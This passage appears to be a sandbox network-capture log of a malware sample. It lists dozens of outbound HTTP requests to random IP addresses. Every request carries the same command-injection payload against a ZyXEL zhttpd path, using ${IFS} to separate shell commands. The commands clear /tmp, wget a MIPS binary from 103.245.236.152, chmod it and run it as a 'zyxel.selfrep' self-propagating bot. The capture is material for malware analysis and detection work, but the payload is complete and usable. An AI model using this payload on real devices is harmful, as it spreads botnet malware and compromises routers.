                                        Jan 14, 2024 16:18:32.156280041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        967192.168.2.1349070146.50.87.212443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.156317949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        968192.168.2.134511467.59.224.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.156362057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        969192.168.2.1338374186.98.110.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.156414032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        970192.168.2.1333126164.34.39.127443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.156470060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        971192.168.2.1336822105.146.109.97443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.156531096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        972192.168.2.1350238219.238.255.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.156615973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        973192.168.2.135741019.1.196.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.156618118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        974192.168.2.135506620.13.158.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.156675100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        975192.168.2.136064045.218.44.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.156752110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        976192.168.2.135742089.52.1.221443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.156785965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        977192.168.2.1337214199.17.90.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.156872034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        978192.168.2.1355876171.124.74.1443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.156929970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        979192.168.2.133574494.166.178.86443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.157036066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        980192.168.2.134612478.44.36.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.157098055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        981192.168.2.1338338100.179.243.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.157130957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        982192.168.2.133829836.22.176.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.157169104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        983192.168.2.133704449.202.18.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.157231092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        984192.168.2.133822850.66.231.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.157279968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        985192.168.2.134542863.70.192.0443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.157321930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        986192.168.2.136015849.198.210.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.157363892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        987192.168.2.133570413.137.57.30443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.157424927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        988192.168.2.135692498.219.177.63443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.157496929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        989192.168.2.1343850213.207.160.127443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.157541037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        990192.168.2.1360340112.39.57.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.157605886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        991192.168.2.1344442190.177.133.6443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.157670975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        992192.168.2.1360830121.9.91.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.157725096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        993192.168.2.1355532184.209.225.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.157779932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        994192.168.2.133774236.181.77.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.157836914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        995192.168.2.135607652.23.58.184443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.157879114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        996192.168.2.1344674190.153.95.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.157968044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        997192.168.2.1346646200.64.126.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.158010960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        998192.168.2.1356410137.43.110.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.158076048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        999192.168.2.1359662105.178.38.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.158113003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1000192.168.2.133278413.251.39.48443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.158186913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1001192.168.2.135016042.67.54.1443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.158247948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1002192.168.2.1339220182.207.150.1443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.158296108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1003192.168.2.133598424.80.248.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.158350945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1004192.168.2.133539469.187.238.127443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.158397913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1005192.168.2.1355890163.236.249.132443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.158458948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1006192.168.2.1338408123.146.139.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.158526897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1007192.168.2.1348586183.133.190.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.158595085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1008192.168.2.1355096126.149.20.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.158643007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1009192.168.2.135967889.138.166.219443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.158715010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1010192.168.2.1348798180.216.87.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.158752918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1011192.168.2.1347802100.249.198.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.158826113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1012192.168.2.134725223.13.173.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.158886909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1013192.168.2.134653863.96.190.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.158943892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1014192.168.2.1355604154.10.150.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.159002066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1015192.168.2.134780046.92.126.206443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.159064054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1016192.168.2.1351212166.220.80.78443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.159096956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1017192.168.2.1357230146.105.119.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.159173965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1018192.168.2.135425890.140.125.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.159226894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1019192.168.2.1341898210.47.68.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.159282923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1020192.168.2.135645686.28.148.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.159349918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1021192.168.2.1350448136.178.129.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.159380913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1022192.168.2.133386818.47.171.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.159435034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1023192.168.2.135234441.74.153.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.159497023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1024192.168.2.1356278189.8.209.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.159571886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1025192.168.2.1351606181.74.49.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.159615040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1026192.168.2.1351904159.41.125.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.159687996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1027192.168.2.133476652.184.183.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.159742117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1028192.168.2.1347990181.242.231.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:32.159776926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1029192.168.2.1344410113.111.1.18443
                                        TimestampBytes transferredDirectionData
